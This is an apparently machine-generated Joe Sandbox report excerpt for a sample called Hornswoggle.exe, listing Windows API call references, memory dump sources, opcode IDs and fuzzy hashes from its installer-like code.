                                                        • Instruction Fuzzy Hash: 0B913470E04228CBEF28CF99C8547ADBBB1FF44305F15816AD856BB291C378A996CF44
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 41c8aa7f72f1f93a2cbcdf9f632d1ef5542b7afda86631119225c1b51720529c
                                                        • Instruction ID: e16a5cd5122dbeef30614bcf2b0def54f3f28e6aa070a3c0d2e235184150711d
                                                        • Opcode Fuzzy Hash: 41c8aa7f72f1f93a2cbcdf9f632d1ef5542b7afda86631119225c1b51720529c
                                                        • Instruction Fuzzy Hash: B1814771E04228CBDF24CFA9C8447ADBBB1FF44305F25816AD856BB281C7789996CF54
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 344cb5358226c0404198c7d180aef45b95627368966a6db8480b9102282d8a8c
                                                        • Instruction ID: 250af7da94f29308333f8738aaa2927d74ee5fc9a8e658dcecc26e0f3faccd11
                                                        • Opcode Fuzzy Hash: 344cb5358226c0404198c7d180aef45b95627368966a6db8480b9102282d8a8c
                                                        • Instruction Fuzzy Hash: A7816631E04228DBDF24CFA9C8447AEBBB1FF44305F11816AD856BB281C7785A96CF54
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2fcb4a8d7ef675eb47b5d59acfe40d72c7d0968365e25b36553ac1c3905db65f
                                                        • Instruction ID: d3a2940f28ad1956632bfd73bee9eff7b9b7c3d901c1c2bf8e917ae235022c86
                                                        • Opcode Fuzzy Hash: 2fcb4a8d7ef675eb47b5d59acfe40d72c7d0968365e25b36553ac1c3905db65f
                                                        • Instruction Fuzzy Hash: 2D713471E00228DBDF24CFA9C8547ADBBB1FF44305F15806AD816BB281C778AA96DF54
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: da2f706e7974a2021bad9ffdb380539c5442a57272a58128905f842303d595e8
                                                        • Instruction ID: aa5f261e6b50ba4db5ffebf04d3efdb0ff665d1262494a5322ec58a673e68ddc
                                                        • Opcode Fuzzy Hash: da2f706e7974a2021bad9ffdb380539c5442a57272a58128905f842303d595e8
                                                        • Instruction Fuzzy Hash: 91715671E00228DBDF28CF99C854BADBBB1FF44305F15806AD816BB281C778A992DF54
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: feb90363471a84b63e8ff2d487282df12a040b782cd1455c92e9c1b62a64594c
                                                        • Instruction ID: ff328c296e0f6909f1720754cbeef76fe0f6b635d5236ea2459b9db161edb35a
                                                        • Opcode Fuzzy Hash: feb90363471a84b63e8ff2d487282df12a040b782cd1455c92e9c1b62a64594c
                                                        • Instruction Fuzzy Hash: 9F715771E00228DBEF28CF99C8547ADBBB1FF44305F15806AD856BB281C778AA56DF44
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00403078
                                                          • Part of subcall function 004031E3: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EE1,?), ref: 004031F1
                                                        • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00402F8E,00000004,00000000,00000000,?,?,00402F08,000000FF,00000000,00000000,00409130,?), ref: 004030AB
                                                        • SetFilePointer.KERNELBASE(0039CC6B,00000000,00000000,004128D8,00004000,?,00000000,00402F8E,00000004,00000000,00000000,?,?,00402F08,000000FF,00000000), ref: 004031A6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: FilePointer$CountTick
                                                        • String ID:
                                                        • API String ID: 1092082344-0
                                                        • Opcode ID: a36c4bf57cb6e858ef063313d681270ada8638ec8a77c6c3e08efa629b838403
                                                        • Instruction ID: 32da71d67e65fe5252f8ded7d9303c2dcf981c5e4867c3c67dada36b4a4d5a13
                                                        • Opcode Fuzzy Hash: a36c4bf57cb6e858ef063313d681270ada8638ec8a77c6c3e08efa629b838403
                                                        • Instruction Fuzzy Hash: DD31B2B29012109FDB10BF2AFE4086A3BECE748356715823BE400B62E0C739DD52DB5E
                                                        APIs
                                                          • Part of subcall function 00406167: FindFirstFileA.KERNELBASE(76003410,00421580,C:\,00405A06,C:\,C:\,00000000,C:\,C:\,76003410,?,76002EE0,00405725,?,76003410,76002EE0), ref: 00406172
                                                          • Part of subcall function 00406167: FindClose.KERNEL32(00000000), ref: 0040617E
                                                        • lstrlenA.KERNEL32 ref: 00402212
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040221C
                                                        • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 00402244
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: FileFindlstrlen$CloseFirstOperation
                                                        • String ID:
                                                        • API String ID: 1486964399-0
                                                        • Opcode ID: 61c72c3acbeab377fc67236d864babf069cda309619979ed43041b7e4bbdfd7d
                                                        • Instruction ID: 708f0fc9269f5af075d905106071f31bae39c4f67462bfddc0a38c2d79fef8c9
                                                        • Opcode Fuzzy Hash: 61c72c3acbeab377fc67236d864babf069cda309619979ed43041b7e4bbdfd7d
                                                        • Instruction Fuzzy Hash: FE112171904318AADB10EFB58945A9EB7F8AF14318F10853BA505FB2D2D6BCC9448B59
                                                        APIs
                                                          • Part of subcall function 0040507C: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
                                                          • Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
                                                          • Part of subcall function 0040507C: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00402C8E,00402C8E,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,00000000,00000000), ref: 004050D8
                                                          • Part of subcall function 0040507C: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\), ref: 004050EA
                                                          • Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
                                                          • Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
                                                          • Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138
                                                          • Part of subcall function 004055F4: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421538,Error launching installer), ref: 0040561D
                                                          • Part of subcall function 004055F4: CloseHandle.KERNEL32(?), ref: 0040562A
                                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                        • String ID:
                                                        • API String ID: 3521207402-0
                                                        • Opcode ID: a33023bfda2542b486336c0229f0f2454b563ffb6bd9b7eab009217adf710acc
                                                        • Instruction ID: 8164f88ac99e46b686dec60b6f66323921365fc284b2c72d55c18730983d64c3
                                                        • Opcode Fuzzy Hash: a33023bfda2542b486336c0229f0f2454b563ffb6bd9b7eab009217adf710acc
                                                        • Instruction Fuzzy Hash: 97015731904114EBDF11AFA1C98899F7BB2EF00344F20817BF601B52E1C7789A419B9A
                                                        APIs
                                                          • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                        • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024B0
                                                        • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024C3
                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsnA627.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: Enum$CloseOpenValue
                                                        • String ID:
                                                        • API String ID: 167947723-0
                                                        • Opcode ID: 47ab25418fb38c8c5b03f0ebc620af0af5168f3c50133958f6b2384b9cd533c1
                                                        • Instruction ID: e09e8e067f2b8771eb66943483239aed03eb61d96520190a1401bf15a77a7747
                                                        • Opcode Fuzzy Hash: 47ab25418fb38c8c5b03f0ebc620af0af5168f3c50133958f6b2384b9cd533c1
                                                        • Instruction Fuzzy Hash: BAF0AD72A04200BFEB11AF659E88EBB7A6DEB80344B10443AF505A61C0D6B84A459A7A
                                                        APIs
                                                          • Part of subcall function 00405AB1: GetFileAttributesA.KERNELBASE(?,?,004056C9,?,?,00000000,004058AC,?,?,?,?), ref: 00405AB6
                                                          • Part of subcall function 00405AB1: SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405ACA
                                                        • RemoveDirectoryA.KERNELBASE(?,?,?,00000000,004058AC), ref: 004056D8
                                                        • DeleteFileA.KERNELBASE(?,?,?,00000000,004058AC), ref: 004056E0
                                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 004056F8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: File$Attributes$DeleteDirectoryRemove
                                                        • String ID:
                                                        • API String ID: 1655745494-0
                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,?,?,00402F08,000000FF,00000000,00000000,00409130,?), ref: 00402F81
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        APIs
                                                          • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                        • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402440
                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsnA627.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID:
                                                        • API String ID: 3677997916-0
                                                        APIs
                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                        • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        APIs
                                                          • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                        • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402327
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00402330
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: CloseDeleteOpenValue
                                                        • String ID:
                                                        • API String ID: 849931509-0
                                                        APIs
                                                        • OleInitialize.OLE32(00000000), ref: 0040515E
                                                          • Part of subcall function 00404094: SendMessageA.USER32(0001043A,00000000,00000000,00000000), ref: 004040A6
                                                        • CoUninitialize.COMBASE(00000404,00000000), ref: 004051AA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: InitializeMessageSendUninitialize
                                                        • String ID:
                                                        • API String ID: 2896919175-0
                                                        APIs
                                                        • ShowWindow.USER32(00010446), ref: 00401579
                                                        • ShowWindow.USER32(00010440), ref: 0040158E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: ShowWindow
                                                        • String ID:
                                                        • API String ID: 1268545403-0
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(?,?,?,00403295,00000009), ref: 0040620E
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406229
                                                          • Part of subcall function 0040618E: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004061A5
                                                          • Part of subcall function 0040618E: wsprintfA.USER32 ref: 004061DE
                                                          • Part of subcall function 0040618E: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004061F2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                        • String ID:
                                                        • API String ID: 2547128583-0
                                                        APIs
                                                        • GetFileAttributesA.KERNELBASE(00000003,00402CF9,C:\Users\user\Desktop\Hornswoggle.exe,80000000,00000003), ref: 00405ADA
                                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AFC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesCreate
                                                        • String ID:
                                                        • API String ID: 415043291-0
                                                        APIs
                                                        • GetFileAttributesA.KERNELBASE(?,?,004056C9,?,?,00000000,004058AC,?,?,?,?), ref: 00405AB6
                                                        • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405ACA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                                        • Instruction ID: a7f0a3a241a8181cef173a1dc0fd71ceb180899bf82cabeb0f5c2b47daa9e471
                                                        • Opcode Fuzzy Hash: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                                        • Instruction Fuzzy Hash: 0AD0C972908121AFC2102728AD0C89BBB65EB54271B118B31FDAAA22B0D7304C528AA5
                                                        APIs
                                                        • CreateDirectoryA.KERNELBASE(?,00000000,0040321E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 004055C5
                                                        • GetLastError.KERNEL32 ref: 004055D3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectoryErrorLast
                                                        • String ID:
                                                        • API String ID: 1375471231-0
                                                        • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                        • Instruction ID: ee333ff4e59061917a1f290c3015eab559b7a368ac9c9957fcbd809aee07952f
                                                        • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                        • Instruction Fuzzy Hash: 04C08C31618102EBDB200B30CE08B073E61AB00381F208831A006F10E4CA349000C93F
                                                        APIs
                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004022BC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfileStringWrite
                                                        • String ID:
                                                        • API String ID: 390214022-0
                                                        • Opcode ID: 4656573f168c310efd594f08e96abc660716981113b3fc3e41d9438b56e455a3
                                                        • Instruction ID: ed5e863b5af70a22674a87f6432e4eb84017b1e79b4e81bbc09640d5f5368664
                                                        • Opcode Fuzzy Hash: 4656573f168c310efd594f08e96abc660716981113b3fc3e41d9438b56e455a3
                                                        • Instruction Fuzzy Hash: 8AE04F31B001746FDB217AF14E8EE7F11989B84348B64417EF601B62C3DDBC4D434AA9
                                                        APIs
                                                        • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: Open
                                                        • String ID:
                                                        • API String ID: 71445658-0
                                                        • Opcode ID: ed1d997f1767e4ebe1524a955060e6e59f62574de8c72c2eb948d7caa6f8d669
                                                        • Instruction ID: 806e3b40af95552ac91145e5354a2e2caa18036cb762c00ee55acc3717e10e35
                                                        • Opcode Fuzzy Hash: ed1d997f1767e4ebe1524a955060e6e59f62574de8c72c2eb948d7caa6f8d669
                                                        • Instruction Fuzzy Hash: D3E04FB6240108AFDB00EFA4DD46FA537ECE714701F008021B608D6091C674E5108B69
                                                        APIs
                                                        • ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,004128D8,0040A8D8,004031E0,00409130,00409130,004030E4,004128D8,00004000,?,00000000,00402F8E), ref: 00405B62
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: ffd4dfc917ffc97e7d907f9c2c90699c203f3b0ebfd4578ed28d6b2a376640fe
                                                        • Instruction ID: c996f9a7b3ae33303237a126fc5a394e9691c2321a0fe14ef9137570749964f2
                                                        • Opcode Fuzzy Hash: ffd4dfc917ffc97e7d907f9c2c90699c203f3b0ebfd4578ed28d6b2a376640fe
                                                        • Instruction Fuzzy Hash: EAE08C3221465EABCF109E509C00EEB3B6CEB00360F008432FD24E2090D230F8209BA4
                                                        APIs
                                                        • WriteFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,0040F673,0040A8D8,00403164,0040A8D8,0040F673,004128D8,00004000,?,00000000,00402F8E,00000004), ref: 00405B91
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: FileWrite
                                                        • String ID:
                                                        • API String ID: 3934441357-0
                                                        • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                        • Instruction ID: 30ff8eedcc03066b87caa2a29a7ef1e7350fb4aaf77a02d24525aee886acae2a
                                                        • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                        • Instruction Fuzzy Hash: 19E0EC3261425AEFEF609E659C00AEB7B7CFB05360F008432F925E6190D635F9219BA5
                                                        APIs
                                                        • SendMessageA.USER32(0001043A,00000000,00000000,00000000), ref: 004040A6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmp
